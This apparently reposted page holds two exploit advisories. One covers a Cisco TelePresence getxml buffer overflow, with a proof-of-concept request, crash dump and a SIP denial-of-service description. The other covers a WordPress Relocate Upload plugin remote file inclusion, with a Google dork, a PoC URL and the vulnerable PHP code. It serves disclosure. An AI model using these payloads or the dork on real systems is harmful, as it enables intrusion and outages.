Example syntax is: http://ip/getxml?location=/Configuration/Video The request is sent to a locally listening shell (tshell). This is the case for all requests relating to performing an action on the system (e.g. config get or set). The shell then sends the input to the "main" application (/app/main, id=0), and the data is passed as a parameter.

It was discovered that the getXML handle does not properly perform length checking on the user supplied input before passing it to the tshell. Furthermore, there is no length checking performed in the tshell and no bounds checking performed in the main application where the parameter is consumed. As such, it is possible to send input that exceeds the size of the receiving buffer, subsequently causing an invalid address to be read. This causes a reboot on the Endpoints. The VCS will not reboot, the process will crash by SIGSEGV (or sigabrt) but it will restart the process itself which drops all calls.

Proof of Concept: GET /wsgi/getxml?location="+("A"*5200)+("\x60"*4)+("X"*4)+"HTTP/1.1\r\n Host: 192.168.6.99\r\n\r\n"

Received signal SIGSEGV (11) in thread 0x129e8480, TID 2670 Illegal memory access at: 0x5858585c Registers: GPR00: 00f2c908 129e5960 129ef920 00000005 00000040 0000000c 00000037 0f315580 GPR08: 00000005 129e5a70 129e5a80 58585858 0f3272d4 11589858 129e6896 0000000b GPR16: 129e6084 11164a1c 00000000 129e6894 00000037 1299ca18 00000005 00000002 GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac 129e5960 GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac 129e5960 NIP: 0f39abc8 MSR: 0000d032 OGPR3: 00000002

As you can see, the crash string is passed as a parameter in GPR 8. The severity of this issue is compounded by the fact that the main application runs as root, this could potentially lead to arbitrary code execution.

3. Pre-authentication SIP Denial of Service - CVE-2011-2577 (CSCtq46500): Cisco TelePresence Endpoints utilise SIP for the call setup protocol. Sending a SIP INVITE with a 4x8 a"s in the MAC Address field and the receive field causes the system to reboot.

Proof of Concept: MXP: Exception 0x1100 : Data TLB load miss Active task FsmMain FSM process : SipTrnsp(0) FSM message : SipTrnsp_Send_Msg_Req from SipTrnsp(0) Data TLB miss (DMISS) : 0x00000000 (illegal addr. accessed)

Solution. Upgrade to TC4.2 for the C series to fix validation issues.

Discovered by. David Klein, Sense of Security Labs.

About us. Sense of Security is a leading provider of information security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application penetration testing firm and trusted IT security advisor to many of the countries largest organisations.

Sense of Security Pty Ltd Level 8, 66 King St Sydney NSW 2000 AUSTRALIA

T: +61 (0)2 9290 4444 F: +61 (0)2 9290 4455 W: http://www.senseofsecurity.com.au E: [email protected] Twitter: @ITsecurityAU

The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf

Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php

Fonte: http://www.exploit-db.com/exploits/17871/

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011 por little_oak

# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested)

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

--- Vulnerable Code --- // Move folder request handled when called by GET AJAX if (isset($_GET['ru_folder'])) { // WP setup and function access define('db_unx_USE_THEMES', false); require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Fonte: http://www.exploit-db.com/exploits/17869/